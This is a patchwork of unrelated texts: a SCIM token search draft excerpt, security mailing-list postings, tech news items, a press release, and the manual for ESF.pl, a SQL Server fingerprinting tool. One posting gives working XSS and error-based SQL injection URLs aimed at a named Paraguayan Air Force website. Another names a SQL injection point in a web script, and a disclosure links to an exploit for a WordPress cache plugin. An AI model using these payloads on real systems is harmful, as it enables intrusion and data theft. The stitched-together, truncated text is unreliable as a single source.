Abstract

   The SCIM 2.0 Core API defines a simple profile for searching for
   specific resource types using filters and qualifiers in combination
   with the HTTP GET verb.  The Token Search specification defines the
   following additional features:

   o  Specification of search terms within an HTTP POST verb to avoid
      accidental leakage of confidential information via HTTP GET URLs,

   o  An optional result set token enabling clients to page through
      results in a state consistent fashion, and

   o  The ability to search across multiple resource types (endpoints)
      and return one or more resource types.



1.  Introduction

   The SCIM Core API is an application-level, RESTful service for
   provisioning and managing identity data on the web.  The SCIM Core
   API specification[I-D.ietf-scim-api] defines methods for creation,
   modification, retrieval and discovery of resources.  This
   specification extends SCIM Core API capabilities to support extended
   searching operations:

   o  the ability to query for one or more resources using a filter,

   o  the ability to search from any resource endpoint including the
      server root,

   o  the ability to support result sets which provide consistent search
      results across multiple requests,

   o  a POST Search profile which supports searching with parameters not
      included in the URL, and

   o  a token parameter which supports returning stateful paged results.

   [Discuss: This extension specification does not propose any change in
   functionality to the existing GET search functions with the exception
   of making resourceType a searchable filter term and returning
   resourceType in all JSON resource representations]

   [Note: this specification may be optionally combined with the SCIM
   core API spec]

1.1.  Requirements Language

   The key words "MUST", "MUST NOT", "REQUIRED", "SHALL", "SHALL NOT",
   "SHOULD", "SHOULD NOT", "RECOMMENDED", "MAY", and "OPTIONAL" in this
   document are to be interpreted as described in [RFC2119].

   Note: For readability and space reasons, some included examples and
   attribute values, and UUID identifiers are shortened.


2.  Search Extension

   The SCIM protocol specifies well known endpoints and HTTP methods for
   managing resources in the core schema.  In SCIM Extended Search, a
   virtual resource known as a "search" is defined.  A "search" is a
   RESTful representation of a search of a set of objects in a SCIM
   Service Provider.  A SCIM extended "search" endpoint can be appended
   to any normal SCIM endpoint in order to define open scope and



Hunt, et al.              Expires June 26, 2013                 [Page 4]

Internet-Draft              SCIM Token Search              December 2012


   specific resource scoped searches.

   SCIM Extended Searches are defined (in ABNF [RFC5234]) as follows:
      SCIMSEARCH   = scimEndpoint [scimSearch] ["/" UUID] ["?" query]

      scimEndpoint = "https://" authority [path-absolute] [scimVers]
                     [scimResType] ["/" UUID]

      scimSearch   = "/.search"

      authority    = [ userinfo "@" ] host [ ":" port ]

      scimVers     = "/V" 1*DIGIT

      scimResType  = "/Users" / "/Groups" / "/" 1*extResChar

      extResChar   = "-" / "." / "_" / DIGIT / ALPHA

                 Figure 1: ABNF for SCIM Search Endpoints

   [Discussion: since a search within a "/Users" endpoint could be
   confused with a resource, do we want to have something more jarring
   like "xsearch" or ".search" (as in well-known urls)?]

   Where:

   scimSearch    Is a special path qualifier that indicates the
                 operation is related to a search.  When used with HTTP
                 GET, scimSearch is OPTIONAL.

   authority, path-absolute, userinfo, host, port  Are defined as per
                 URI Syntax ABNF [RFC3986]

   query         Is any SCIM query term as specified in section 3.2 of
                 the SCIM Core API [I-D.ietf-scim-api].

   scimVers      Is the SCIM Service Provider API version.

   scimResType   Is a SCIM resource type such as "Users", "Groups" or
                 any other schema extended resource supported by the
                 service provider.

   UUID          Identifies a unique SCIM resource or SCIM search result
                 that is retrievable from the SCIM Service Provider (see
                 [RFC4122]).

   Example SCIM Search endpoints include:


Internet-Draft              SCIM Token Search              December 2012


   http://example.com/scim/v2/.search
                 for server-wide searches

   http://example.com/scim/v2/Users/.search
                 for searches of User resources only

   http://example.com/scim/v2/Groups/.search
                 for searches of Group resources only

   http://example.com/scim/v2/
   .search?searchId=607dac9b24a2;startIndex=20
                 to return results from a previously executed query

   Token search is initiated by using either an HTTP POST or HTTP GET
   command (see next sections) to pass search parameters AND by setting
   the parameter "stateful" to "true".  The server responds and returns
   results in a JSON result set along with a searchId token if stateful
   results are available.

######################Exploit#######################
# Exploit Title: SQL/XSS/phpinfo() Fuerza Aera Paraguaya
#
# Exploit Author: YeiZeta
#
# Category: Web Application
#
##############################################

XSS

http://www.fuerzaaerea.mil.py/index.php/%22ns=%22theJoker(0x000136)%22%3E%3Ch1%3EXSS%20DETECT%20BY%20YEI%20ZETA%3C/h1%3E

phpinfo

http://www.fuerzaaerea.mil.py/phpinfo.php

SQL

http://www.fuerzaaerea.mil.py/index.php?pageNum_rs_noticias=-1

http://www.fuerzaaerea.mil.py/index.php?pageNum_rs_noticias=-1%20or%201%3d1%20and%20(select%201%20and%20row(1%2c1)%3e(select%20count(*)%2cconcat(CONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97))%2c0x3a%2cfloor(rand()*2))x%20from%20(select%201%20union%20select%202)a%20group%20by%20x%20limit%201))&totalRows_rs_noticias=83&cod=index
##############################################
https://www.facebook.com/TheJokerHack
##############################################





//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

From the developers' description [1], W3 Total Cache is:
The most complete WordPress performance framework.
Recommended by web hosts like: MediaTemple, Host Gator, Page.ly and WP Engine and countless more.
Trusted by countless sites like: stevesouders.com, mattcutts.com, mashable.com, smashingmagazine.com, makeuseof.com, yoast.com, kiss925.com, pearsonified.com, lockergnome.com, johnchow.com, ilovetypography.com, webdesignerdepot.com, css-tricks.com and tens of thousands of others.
W3 Total Cache improves the user experience of your site by improving your server performance, caching every aspect of your site, reducing the download times and providing transparent content delivery network (CDN) integration.
Downloads: 1,388,876
Ratings: 4.6 out of 5 stars

Unfortunately, it's frequently incorrectly deployed. When I set it up
by going to the Wordpress panel and choosing "add plugin" and
selecting the plugin from the Wordpress Plugin Catalog (or whatever),
it left two avenues of attack open:

1) Directory listings were enabled on the cache directory, which means
anyone could easily recursively download all the database cache keys,
and extract ones containing sensitive information, such as password
hashes. A simple google search of
"inurl:wp-content/plugins/w3tc/dbcache" and maybe some other magic
reveals this wasn't just an issue for me. As W3 Total Cache already
futzes with the .htaccess file, I see no reason for it not to add
"Options -Indexes" to it upon installation. I haven't read any W3
documentation, so it's possible this is a known and documented
misconfiguration, but maybe not.

2) Even with directory listings off, cache files are by default
publicly downloadable, and the key values / file names of the database
cache items are easily predictable. Again, it seems odd that "deny
from all" isn't added to the .htaccess file. Maybe it's documented
somewhere that you should secure your directories, or maybe it isn't;
I'm not sure.

If I had to categorize these holes, I'd say they're due to
"misconfiguration", but I figure it's relevant to write in to
full-disclosure & webappsec because I'm usually not horrible with
configuring things and I made these mistakes several times without
realizing. I'm copying the author on this email, as he may want to
include a warning message where nieve folks like myself can see it, or
document these somewhere if they're not already, or at least apply the
two .htaccess tweaks mentioned above.

Anyway I put together a short and simple shell script that works
pretty decently against my own various wordpress websites, and
exploits the configuration error in point (2) above. Exploiting point
(1) can be done with wget & grep and is even more dull than the below
exploit.

****************
W3 Total Fail

Exploit for point (2):
http://git.zx2c4.com/w3-total-fail/tree/w3-total-fail.sh  (Read the
entire usage message.)

Screencast for point (2):
http://git.zx2c4.com/w3-total-fail/plain/screencast.ogv or
https://www.youtube.com/watch?v=sqZ_zYLFDSo

****************


Merry Christmas.


- Jason
  zx2c4



[1] http://wordpress.org/extend/plugins/w3-total-cache/




//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information

he two countries agree on a plan to curtail theft of intellectual property, after President Obama grants Russia "permanent normal trade relations" and the two nations agree to have the WTO's tenets apply between them.

The U.S. and Russia have agreed on an "action plan" to fight the theft of intellectual property, including online piracy of copyrighted materials. The Office of the United States Trade Representative announced the agreement yesterday, saying that the plan's priorities include, quote:

"Combating copyright piracy over the Internet, including actions such as takedowns of infringing content, action against persons responsible for IPR [Intellectual Property Rights] crimes, coordination with rights holders, cooperation and information exchange between IPR enforcement officials, and devotion of resources and personnel to law enforcement agencies to combat piracy over the Internet.
"Enhancing IPR Enforcement, including actions against counterfeiting, piracy, and circumventing technological protection measures; imposing deterrent penalties and sentences; conducting raids; seizing and, where appropriate, destroying IPR infringing products and the equipment and materials used to produce such products; and promoting transparency and public awareness of IPR enforcement actions.

"Coordinating on Legislation and other Issues, including on Russia's draft legislation on liability for Internet service providers to combat Internet piracy, consulting on implementation of Russia's WTO pharmaceutical test data protection commitments, administrative penalties, and exchanging information on enforcement mechanisms and best practices for judges."

Google-as-curator is upon us


Google has taken two steps to prevent its Chrome browser becoming an attack vector for malware that runs as extensions to the browser.

Like many other browsers, Chrome allows users to install “extensions”, apps that add functionality. Google even runs the “Chrome Web Store” to promote extensions.

Security outfit Webroot recently pointed out that some of the extensions in the store are illegitimate, data-sucking privacy invaders that trick users with offers to do things like change the colour of Facebook and then suck out all their data.

Google has responded in two ways, one of which is a new service “To help keep you safe on the web” that will see the company “analyzing every extension that is uploaded to the Web Store and take down those we recognize to be malicious.”

Changes are also coming in the forthcoming version 25 of the browser, which will no longer allow extensions to install without users’ knowledge. That’s currently possible because Chrome, when running on Windows, can is designed to allow unseen installs “to allow users to opt-in to adding a useful extension to Chrome as a part of the installation of another application.”

“Unfortunately,” Google now says in a blog post, “this feature has been widely abused by third parties to silently install extensions into Chrome without proper acknowledgement from users.”

read more....http://www.theregister.co.uk/2012/12/23/google_bans_auto_install_chrome_extensions/

DALLAS, Dec. 24, 2012 /PRNewswire/ -- With the Federal Communications Commission (FCC) reporting that more than 40 percent of smartphone users have no antivirus software on their smartphones and less than 50 percent use password protection, how can you better protect your mobile devices? The FCC has your answer.

NQ Mobile contributed to the FCC's new Smartphone Security Checker. The tool was developed in collaboration with government experts, smartphone developers, and private IT and security companies like NQ Mobile. The checker allows consumers to create a customized 10-step security checklist tailored to their smartphone's operating system (Apple iOS, Android, BlackBerry, or Windows Phone).
To help your friends and family stay safe this holiday season, visit http://www.fcc.gov/smartphone-security. The site will walk you through the following:
How to set pins and passwords for your smartphone
Download security apps that enable remote locating and data wiping
Back-up the data on your smartphone if your device is lost or stolen
Wipe data on your old phone and where to go to donate, resell or recycle it
Safely use public Wi-Fi networks and what steps to take if your phone is stolen
It's crucial that consumers around the nation become educated about growing mobile malware threats and learn how to protect their mobile devices. By offering a security solution like the new FCC security checker, we're actively assuring that the public has access to tools that will insure the safety and security of their valuable mobile data.
About NQ Mobile
NQ Mobile Inc is a leading global provider of trusted mobile Internet services built on its world-class acquisition, engagement and monetization platform.  The company was one of the first to recognize the growing security threats targeting smartphone users and now has about 242 million registered and 85 million active user accounts globally. NQ Mobile's cloud-based trust platform has been recognized by third-party testing facilities around the world as the most effective solution for detecting and combating mobile threats. NQ Mobile is recognized as a global pioneer in mobile innovation and technology leadership.  NQ Mobile maintains dual headquarters in Dallas, TX, USA and Beijing, China. For more information on NQ Mobile, please visit http://www.nq.com.
SOURCE NQ Mobile Inc.


RELATED LINKS
http://www.nq.com
PR Newswire (http://s.tt/1xCaa)

[Description]
Microsoft SQL Server fingerprinting can be a time consuming process, because it involves trial and error methods to
determine the exact version. Intentionally inserting an invalid input to obtain a typical error message or using
certain alphabets that are unique for certain server are two of the many ways to possibly determine the version, but
most of them require authentication, permissions and/or privileges on Microsoft SQL Server to succeed.

Instead, ESF.pl uses a combination of crafted packets for SQL Server Resolution Protocol (SSRP) and Tabular Data Stream
Protocol (TDS) (protocols natively used by Microsoft SQL Server) to accurately perform version fingerprinting and
determine the exact Microsoft SQL Server version. ESF.pl also applies a sophisticated Scoring Algorithm Mechanism
(Powered by Exploit Next Generation++ Technology), which is a much more reliable technique to determine the Microsoft
SQL Server version. It is a tool intended to be used by:
        • Database Administrators
        • Database Auditors
        • Database Owners
        • Penetration Testers

Having over FIVE HUNDRED unique versions within its fingerprint database, ESF.pl currently supports fingerprinting for:
        • Microsoft SQL Server 2000
        • Microsoft SQL Server 2005
        • Microsoft SQL Server 2008
        • Microsoft SQL Server 2012

ESF.pl re-invented the techniques used by several public tools (SQLPing Tool by Chip Andrews, Rajiv Delwadia and
Michael Choi, and SQLVer Tool by Chip Andrews). ESF.pl shows the MAPPED VERSION and PATCH LEVEL (i.e., Microsoft SQL
Server 2008 SP1 (CU5)) instead of showing only the RAW VERSION (i.e., Microsoft SQL Server 10.0.2746). ESF.pl also has
the ability to show the MOST LIKELY version, based on its sophisticated Scoring Algorithm Mechanism, and allows to
determine vulnerable andunpatched Microsoft SQL Server better than many of public and commercial tools.

This version is a completely rewritten version in Perl, making ESF.pl much more portable than the previous binary
version (Win32), and its original purpose is to be used as a tool to perform automated penetration test. This version
also includes the followingMicrosoft SQL Server versions to its fingerprint database:
        • Microsoft SQL Server 2012 SP1 (CU1)
        • Microsoft SQL Server 2012 SP1
        • Microsoft SQL Server 2012 SP1 CTP4
        • Microsoft SQL Server 2012 SP1 CTP3
        • Microsoft SQL Server 2012 SP0 (CU4)
        • Microsoft SQL Server 2012 SP0 (MS12-070)
        • Microsoft SQL Server 2012 SP0 (CU3)
        • Microsoft SQL Server 2012 SP0 (CU2)
        • Microsoft SQL Server 2012 SP0 (CU1)
        • Microsoft SQL Server 2012 SP0 (MS12-070)
        • Microsoft SQL Server 2012 SP0 (KB2685308)
        • Microsoft SQL Server 2012 RTM

To achieve an accurate and much more reliable version fingerprinting, ESF.pl employes the following steps, mimicking a
valid negotiation between the CLIENT and the SERVER:

        • SSRP Client Unicast Request (CLNT_UCAST_EX)
        • SSRP Client Unicast Instance Request (CLNT_UCAST_INST)
        • TDS Pre-Login Request (PRELOGIN)

        NOTE: ESF.pl IS NOT a SQLi tool, and has no ability to perform such task.

[Manual Page]
NAME
    ESF.pl - SQL Fingerprint powered by *ENG++ Technology*

VERSION
    This document describes ESF.pl [Version 1].

USAGE
    "ESF.pl host [options]"

DESCRIPTION
    Microsoft SQL Server fingerprinting can be a time consuming process,
    because it involves trial and error methods to determine the exact
    version. Intentionally inserting an invalid input to obtain a typical
    error message or using certain alphabets that are unique for certain
    server are two of the many ways to possibly determine the version, but
    most of them require authentication, permissions and/or privileges on
    Microsoft SQL Server to succeed.

    Instead, ESF.pl uses a combination of crafted packets for SQL Server
    Resolution Protocol ("SSRP") and Tabular Data Stream Protocol ("TDS")
    (protocols natively used by Microsoft SQL Server) to accurately perform
    version fingerprinting and determine the exact Microsoft SQL Server
    version. ESF.pl also applies a sophisticated Scoring Algorithm Mechanism
    (powered by *Exploit Next Generation++ Technology*), which is a much
    more reliable technique to determine the Microsoft SQL Server version.
    It is a tool intended to be used by:
    *   Database Administrators
    *   Database Auditors
    *   Database Owners
    *   Penetration Testers

    Having over "FIVE HUNDRED" unique versions within its fingerprint
    database, ESF.pl currently supports fingerprinting for:
    *   Microsoft SQL Server 2000
    *   Microsoft SQL Server 2005
    *   Microsoft SQL Server 2008
    *   Microsoft SQL Server 2012

    ESF.pl re-invented the techniques used by several public tools (SQLPing
    Tool by *Chip Andrews*, *Rajiv Delwadia* and *Michael Choi*, and SQLVer
    Tool by *Chip Andrews*) (see "SEE ALSO" for further information). ESF.pl
    shows the "MAPPED VERSION" and "PATCH LEVEL" (i.e., Microsoft SQL Server
    2008 SP1 (CU5)) instead of showing only the "RAW VERSION" (i.e.,
    Microsoft SQL Server 10.0.2746). ESF.pl also has the ability to show the
    *MOST LIKELY* version, based on its sophisticated Scoring Algorithm
    Mechanism, and allows to determine "vulnerable" and "unpatched"
    Microsoft SQL Server better than many of public and commercial tools.

    This version is a completely rewritten version in Perl, making ESF.pl
    much more portable than the previous binary version (Win32), and its
    original purpose is to be used as a tool to perform automated
    penetration test. This version also includes the following Microsoft SQL
    Server versions to its fingerprint database:
    *   Microsoft SQL Server 2012 SP1 (CU1)
    *   Microsoft SQL Server 2012 SP1
    *   Microsoft SQL Server 2012 SP1 CTP4
    *   Microsoft SQL Server 2012 SP1 CTP3
    *   Microsoft SQL Server 2012 SP0 (CU4)
    *   Microsoft SQL Server 2012 SP0 (MS12-070)
    *   Microsoft SQL Server 2012 SP0 (CU3)
    *   Microsoft SQL Server 2012 SP0 (CU2)
    *   Microsoft SQL Server 2012 SP0 (CU1)
    *   Microsoft SQL Server 2012 SP0 (MS12-070)
    *   Microsoft SQL Server 2012 SP0 (KB2685308)
    *   Microsoft SQL Server 2012 RTM

        *NOTE: ESF.pl "IS NOT" a *SQLi* tool, and has no ability to perform
        such task.*

  Fingerprinting Steps
    As described in "DESCRIPTION", ESF.pl uses a combination of crafted
    packets for "SSRP" and "TDS" to accurately perform version
    fingerprintfing. To achieve an accurate and much more reliable version
    fingerprinting, ESF.pl employes the following steps, mimicking a valid
    negotiation between the CLIENT and the SERVER:

    1) "SSRP" "Client Unicast Request" (CLNT_UCAST_EX)
        This step attempts to gather the Microsoft SQL Server single
        instance or even multiple instances (see "MULTIPLE SQL SERVER
        INSTANCES WARNING" for further information), and the respective
        "TDS" communication port(s) - the "TDS" communication port for each
        instances can be dynamic or default (see "DYNAMIC SQL SERVER TCP
        PORT WARNING" and "DEFAULT SQL SERVER TCP PORT WARNING" for further
        information).

            *NOTE: If this step fails, the "STEP 2" is not performed and the
            "STEP 3" will use "TDS" default communication port only.*

    2) "SSRP" "Client Unicast Instance Request" (CLNT_UCAST_INST)
        This step attempts to use the information gathered by *step 1* to
        collect, parse and match information for a single instances or for
        multiple instances (see "MULTIPLE SQL SERVER INSTANCES WARNING" for
        further information). Once the collecting, parsing and matching is
        done, the fingerprinting data is stored to be validated by the
        sophisticated Scoring Algorithm Mechanism (powered by *Exploit Next
        Generation++ Technology*).

            *NOTE: If the "STEP 1" fails, this step is not performed.*

    3) "TDS" "Pre-Login Request" (PRELOGIN)
        This step attempts to use the information gathered by *step 1* to
        collect, parse and match information for a single instances running
        on "TDS" default coommunication port (see "DEFAULT SQL SERVER TCP
        PORT WARNING" for further information) or for multiple instances
        (see "MULTIPLE SQL SERVER INSTANCES WARNING" for further
        information) running on "TDS" dynamic communication port(s) (see
        "DYNAMIC SQL SERVER TCP PORT WARNING" for further information. Once
        the collecting, parsing and matching is done, the fingerprinting
        data is stored to be validated by the sophisticated Scoring
        Algorithm Mechanism (powered by *Exploit Next Generation++
        Technology*).

            *NOTE: If "STEP 1" fails, this step will use "TDS" default
            communication port only.*

  SSRP
    As described in "[MS-SQLR]: SQL Server Resolution Protocol"
    specification document (see "SEE ALSO" for further information).

    1) "1.3 Overview"
        "The first case is used for the purpose of determining the
        communication endpoint information of a particular database
        instance, whereas the second case is used for enumeration of
        database instances in the network and to obtain the endpoint
        information of each instance." (*page 8*)

        "The SQL Server Resolution Protocol does not include any facilities
        for authentication, protection of data, or reliability. The SQL
        Server Resolution Protocol is always implemented on top of the UDP
        Transport Protocol [RFC768]." (*page 8*)

    2) "1.9 Standards Assignments"
        "The client always sends its request to UDP port 1434 of the server
        or servers." (*page 10*)

    3) "2.2.2 CLNT_UCAST_EX"
        "The CLNT_UCAST_EX packet is a unicast request that is generated by
        clients that are trying to determine the list of database instances
        and their network protocol connection information installed on a
        single machine. The client generates a UDP packet with a single
        byte, as shown in the following diagram." (*page 11*)

    4) "2.2.3 CLNT_UCAST_INST"
        "The CLNT_UCAST_INST packet is a request for information related to
        a specific instance. The structure of the request is as follows."
        (*page 12*)

    According to the previous quotes, the "SSRP" *is used for the purpose of
    determining the communication endpoint information of a particular
    database instance*, which *does not include any facilities for
    authentication*, and both "SSRP" "CLNT_UCAST_EX Request" and "SSRP"
    "CLNT_UCAST_INST Request" can be used *for the purpose of determining
    the communication endpoint information*.

    Based on this analysis, it is possible to determine the Microsoft SQL
    Server version using the "SSRP" "CLNT_UCAST_EX Request" and/or "SSRP"
    "CLNT_UCAST_INST Request". The version is available within the "SSRP"
    "CLNT_UCAST_EX Response" and/or "SSRP" "CLNT_UCAST_INST Response", and
    it is a gratuitous information sent from SERVER to CLIENT to ensure they
    will establish a communication correctly, using the correct database
    instance and the same dialect by both CLIENT and SERVER.

    Here is a "SSRP" "CLNT_UCAST_INST Request" and "SSRP" "CLNT_UCAST_INST
    Response" sample traffic dump between the ESF.pl and a Microsoft SQL
    Server 2008 SP1:

    "SSRP" "CLNT_UCAST_INST Request"
         0000   04 4d 53 53 51 4c 53 45 52 56 45 52              .MSSQLSERVER

    "SSRP" "CLNT_UCAST_INST Response"
         0000   05 77 00 53 65 72 76 65 72 4e 61 6d 65 3b 53 45  .w.ServerName;SE
         0010   52 56 45 52 30 34 3b 49 6e 73 74 61 6e 63 65 4e  RVER04;InstanceN
         0020   61 6d 65 3b 4d 53 53 51 4c 53 45 52 56 45 52 3b  ame;MSSQLSERVER;
         0030   49 73 43 6c 75 73 74 65 72 65 64 3b 4e 6f 3b 56  IsClustered;No;V
         0040   65 72 73 69 6f 6e 3b 31 30 2e 30 2e 32 35 33 31  ersion;10.0.2531
         0050   2e 30 3b 74 63 70 3b 31 34 33 33 3b 6e 70 3b 5c  .0;tcp;1433;np;\
         0060   5c 53 45 52 56 45 52 30 34 5c 70 69 70 65 5c 73  \SERVER04\pipe\s
         0070   71 6c 5c 71 75 65 72 79 3b 3b                    ql\query;;

    As demonstrated above, the information within the "SSRP" "CLNT_UCAST_EX
    Response" represents the version for Microsoft SQL Server 2008 SP1
    (*10.0.2531*), as well as many interesting information.

        *NOTE: no authentication and gratuitous information.*

  TDS
    As described in "[MS-TDS]: Tabular Data Stream Protocol" specification
    document (see "SEE ALSO" for further information).

    1) "2.2.1.1 Pre-Login"
        "Before a login occurs, a handshake denominated pre-login occurs
        between client and server, setting up contexts such as encryption
        and MARS-enabled." (*page 17*)

    2) "2.2.2.1 Pre-Login Response"
        "The pre-login response is a tokenless packet data stream. The data
        stream consists of the response to the information requested by the
        client pre-login message." (*page 18*)

    3) "2.2.4.1 Tokenless Stream"
        "As shown in the previous section, some messages do not use tokens
        to describe the data portion of the data stream. In these cases, all
        the information required to describe the packet data is contained in
        the packet header. This is referred to as a tokenless stream and is
        essentially just a collection of packets and data." (*page 24*)

    4) "2.2.6.4 PRELOGIN"
        "A message sent by the client to set up context for login. The
        server responds to a client PRELOGIN message with a message of
        packet header type 0x04 and the packet data containing a PRELOGIN
        structure." (*page 59*)

        "[TERMINATOR] [0xFF] [Termination token.]" (*page 61*)

        "TERMINATOR is a required token, and it MUST be the last token of
        PRELOGIN_OPTION. TERMINATOR does not include length and bits
        specifying offset." (*page 61*)

    According to the previous quotes, the "TDS" "Pre-Login" is just a
    handshake, i.e., the "TDS" "Pre-Login" is a *tokenless packet data
    stream* of the *pre-authentication state* to establish the negotiation
    between the CLIENT and the SERVER - as described in "Figure 3: Pre-login
    to post-login sequence" (*page 103*).

    Based on this analysis, it is possible to determine the Microsoft SQL
    Server version during the "TDS" "Pre-Login" handshake. It is an
    undocumented feature, but it is not a bug or a leakage, in fact, it is
    more likely to be an "AS IS" embedded feature that allows CLIENT to
    establish a negotiation with SERVER. The version is available within the
    "TDS" "Pre-Login Response" packet data stream, and it is a gratuitous
    information sent from SERVER to CLIENT to ensure they will establish a
    communication correctly, using the correct database instance and the
    same dialect by both CLIENT and SERVER.

    Here is a *tokenless packet data stream* sample traffic dump of a "TDS"
    "Pre-Login" handshake between the ESF.pl and a Microsoft SQL Server 2008
    SP1:

    "TDS" "Pre-Login Request"
         0000   12 01 00 2f 00 00 01 00 00 00 1a 00 06 01 00 20
         0010   00 01 02 00 21 00 01 03 00 22 00 04 04 00 26 00
         0020   01 ff 09 00 00 00 00 00 01 00 b8 0d 00 00 01

    "TDS" "Pre-Login Response"
         0000   04 01 00 2b 00 00 01 00 00 00 1a 00 06 01 00 20
         0010   00 01 02 00 21 00 01 03 00 22 00 00 04 00 22 00
         0020   01 ff 0a 00 09 e3 00 00 01 00 01

    As demonstrated above, there are four bytes following the "TERMINATOR"
    (*0xFF* at the OFFSET *34*), and they represent the version for
    Microsoft SQL Server 2008 SP1 (*10.0.2531*):

    1) OFFSET *35* represents the Major Version (0x0a = *10*)
    2) OFFSET *36* represents the Minor Version (0x00 = *0*)
    3) OFFSETS *37*/*38* represent the Build Version ([0x09*256]+0xe3 =
    *2531*)

        *NOTE: no authentication and gratuitous information.*

  MULTIPLE SQL SERVER INSTANCES WARNING
    Warns the availability of multiple instances ("Default Instances" as
    well as "Named Instances"). This information is collected and parsed by
    "STEP 1" and used and validated by "STEP 3" (see "Fingerprinting Steps"
    for further information).

        *NOTE: Only in "verbose" mode (see "OPTIONS" for further
        information).*

  DYNAMIC SQL SERVER TCP PORT WARNING
    Warns the availability of multiple instances ("Default Instances" as
    well as "Named Instances") running on "TDS" dynamic communication
    port(s). This information is collected and parsed by "STEP 1" and used
    and validated by "STEP 3" (see "Fingerprinting Steps" for further
    information).

        *NOTE: Only in "verbose" mode (see "OPTIONS" for further
        information).*

  DEFAULT SQL SERVER TCP PORT WARNING
    Warns the availability of "Default Instances" running on "TDS" default
    communication port(s) . This information is collected and parsed by
    "STEP 1" and used and validated by "STEP 3" (see "Fingerprinting Steps"
    for further information).

        *NOTE: Only in "verbose" mode (see "OPTIONS" for further
        information).*

  MOST LIKELY WARNING
    ADD DESCRIPTION HERE

OPTIONS
    "-d,--debug" (default OFF)
        Configure the debug mode, giving much more information details about
        the fingerprinting tasks.

    "-f,--fingerprintdb FILE" (default "ESF.db")
        Configure an optional file for SQL Fingerprint Database.

    "-t,--timeout NUM" (default 30)
        Configure a specific connection timeout (seconds), allowing ESF.pl
        to wait until close the connection.

    "-T,--TIMEOUT NUM" (default 5)
        Configure a specific timeout (seconds), allowing ESF.pl to wait
        until execute the next subroutine.

    "-v,--verbose" (default OFF)
        Configure the verbose mode, giving information details about the
        fingerprinting tasks.

    "-m,--manpage"
        Display the manual page embedded in ESF.pl, being the manual page in
        POD (Plain Old Documentation) format.

    "-h,-?,--help"
        Display the help and usage message.

DEPENDENCIES
    Digest::MD5(3)
        See "Getopt::Long's Perl Documentation" for further information.

    Getopt::Long(3)
        See "Getopt::Long's Perl Documentation" for further information.

    IO::Socket(3)
        See "IO::Socket's Perl Documentation" for further information.

    Pod::Usage(3)
        See "Pod::Usage's Perl Documentation" for further information.

    POSIX(1)
        See "POSIX's Perl Documentation" for further information.

    Switch(3)
        See "Switch's Perl Documentation" for further information.

    PERL(1) v5.10.1 or v5.12.4
        ESF.pl has been widely tested under Perl v5.10.1 (Ubuntu 10.04 LTS)
        and Perl v5.12.4 (OS X Mountain Lion). Due to this, ESF.pl requires
        one of the mentioned versions to be executed. The following tests
        will be performed to ensure its capabilities:

         BEGIN {
            my $subname = (caller(0))[3];
            eval("require 5.012004;");
            eval("require 5.010001;") if $@;
            die "$subname\{\}: Unsupported Perl version ($]).\n" if $@;
         }

            *NOTE: If you are confident that your Perl version is capable to
            execute the ESF.pl, please, remove the above tests and send
            feedback to the author*.

        See "PERL's Perl Documentation" for further information.

SEE ALSO
    Digest::MD5(3), IO::Socket(3), Getopt::Long(3), Pod::Usage(3), POSIX(1),
    Socket(3), Switch(3), PERL(1), [RFC793]
    <http://www.ietf.org/rfc/rfc793.txt>, [RFC768]
    <http://www.ietf.org/rfc/rfc768.txt>, TDS
    <http://msdn.microsoft.com/en-us/library/dd304523.aspx>, SSRP
    <http://msdn.microsoft.com/en-us/library/cc219703.aspx>, SQLPing &
    SQLVer Tools <http://www.sqlsecurity.com/downloads>

HISTORY
    2008
        Private Release (Late 2008)

    2009
        H2HC Talk (November 28)

    2010
        MSSQLFP BETA-3 (January 5)

        MSSQLFP BETA-4 (January 18)

        ESF 1.00.0006 (February 10)

        ESF 1.10.101008/CTP (October 8)

    2012
        ESF 1.12.120115/RC0 (January 15)

BUGS AND LIMITATIONS
    Report ESF.pl bugs and limitations directly to the author.

AUTHOR
    Nelson Brito <mailto:nbrito () sekure org>.

COPYRIGHT
    Copyright(c) 2010-2012 Nelson Brito. All rights reserved worldwide.

    Exploit Next Generation++ Technology and/or other noted Exploit Next
    Generation++ and/or ENG++ related products contained herein are
    registered trademarks or trademarks of Nelson Brito. Any other
    non-Exploit Next Generation++ related products, registered and/or
    unregistered trademarks contained herein is only by reference and are
    the sole property of their respective owners.

    *Exploit Next Generation++ Technology*, innovating since 2010.

LICENSE
    This program is free software: you can redistribute it and/or modify it
    under the terms of the *GNU General Public License* as published by the
    Free Software Foundation, either version 3 of the License, or (at your
    option) any later version.

    You should have received a copy of the *GNU General Public License*
    along with this program. If not, see <http://www.gnu.org/licenses/>.

DISCLAIMER OF WARRANTY
    This program is distributed in the hope that it will be useful, but
    WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the *GNU
    General Public License* for more details.

[Download and Source Code]
For immediately download, please, go to:
        • http://code.google.com/p/sql-fingerprint-next-generation/

Atenciosamente / Best regards / Saludos.

Nelson Brito
http://about.me/nbrito

"Quemadmodum gladius neminem occidit, occidentis telum est." (Epistulae morales ad Lucilium, Lucius Annaeus Seneca)

Fingerprint: 1983 7E8E D6C9 CAF8 4B4F A8C9 A36D FC5B 4FFC 316C

#!/bin/sh -- # -*- perl -*-
eval 'exec `which perl` -x -S $0 ${1+"$@"} ;'
        if 0;
{(($^O=~/^[M]*$32/i)&&($0=~s!.*\\!!))||($0=~s!^.*/!!)};

# Exploit Title: City Directory Review and Rating Script SQL Injection
Vulnerability
# Date: 22.12.2012
# Author: 3spi0n
# Script Vendor or Software Link:
http://b-scripts.com/en/18-city-reviewer-yelp-clone.html
# Category: WebApps
# Type: SQL Injection [MySQLi]
# Tested On: Ubuntu 12.10 - Win7

=================================================
# Demo: http://b-scripts.com/demo/city_reviewer/

# MySQLi Detected On:
http://server/city_reviewer/search.php?category=6


=================================================

# My Blog: www.Ryuzaki.in
# Social : Twitter.com/bariiiscan
# My Team: Grayhatz Inc. & Agedz Corp.
# Turkey.

